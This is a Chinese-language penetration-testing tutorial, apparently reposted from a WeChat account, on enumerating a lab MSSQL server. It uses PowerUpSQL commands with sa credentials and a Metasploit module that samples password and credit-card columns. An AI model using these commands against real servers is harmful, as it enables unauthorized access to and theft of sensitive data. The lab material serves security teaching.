目录
实验室设置
PowerupSQL
- 提取数据库名称
- 提取数据库信息
- 提取数据库登录信息
Metasploit
实验室设置
按照MSSQL Lab Setup ,并从Github下载 PowerupSQL。PowerUpSQL包含支持 SQL Server 发现、弱配置审计、大规模权限提升以及 OS 命令执行等后利用操作的功能。
为了列举有趣的信息,让我们创建一个数据库、表和记录。
create database bank;
CREATETABLE Customers (
CustomerID int,
LastName varchar(255),
FirstName varchar(255),
passw varchar(255),
creditcard varchar(255)
);
INSERTINTO Customers(CustomerID, LastName, FirstName, passw, creditcard)
VALUES ('01', 'Technologies','Ignite', 'admin123', '1111-2222-3333-4444');
INSERTINTO Customers(CustomerID, LastName, FirstName, passw, creditcard)
VALUES ('02', 'Sharma','Nisha', 'admin1234', '5555-6666-7777-8888');
INSERTINTO Customers(CustomerID, LastName, FirstName, passw, creditcard)
VALUES ('03', 'Chandel','Raj', 'admin12345', '9999-1010-1020-1030');
INSERTINTO Customers(CustomerID, LastName, FirstName, passw, creditcard)
VALUES ('04', 'Madan','Geet', 'admin12311', '1234-5678-9012-3456');
提取数据库名称
您可以使用以下命令获取所有可访问的 SQL Server 数据库的列表。
Get-SQLDatabaseThreaded -Threads 10-Username sa -Password Password@1-Instance WIN-P83OS778EQKSQLEXPRESS -verbose |select-ExpandProperty DatabaseName
提取数据库登录信息
该模块将使用 SUSER_NAME() 和公共角色根据登录 ID 枚举 SQL Server 登录。
Import-Module .PowerUpSQL
Get-SQLFuzzServerLogin -Username sa -Password Password@1-Instance WIN-P83OS778EQKSQLEXPRESS -verbose
Metasploit
此脚本将在 SQL Server 上的所有非默认数据库中搜索与 TSQL KEYWORDS 选项中定义的关键字匹配的列。如果找到与定义的关键字匹配的列名,并且相关表中存在数据,则脚本将从每个受影响的表中选择一个记录样本。样本大小由 SAMPLE_SIZE 选项决定,并以 CSV 格式输出。
use auxiliary/admin/mssql/mssql_findandsampledata
set rhosts 192.168.1.146
set username Password@1
set sample_size 4
set keywords FirstName|passw|credit
exploit
原文始发于微信公众号(三沐数安):渗透测试人员的 MSSQL:提取有用信息
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论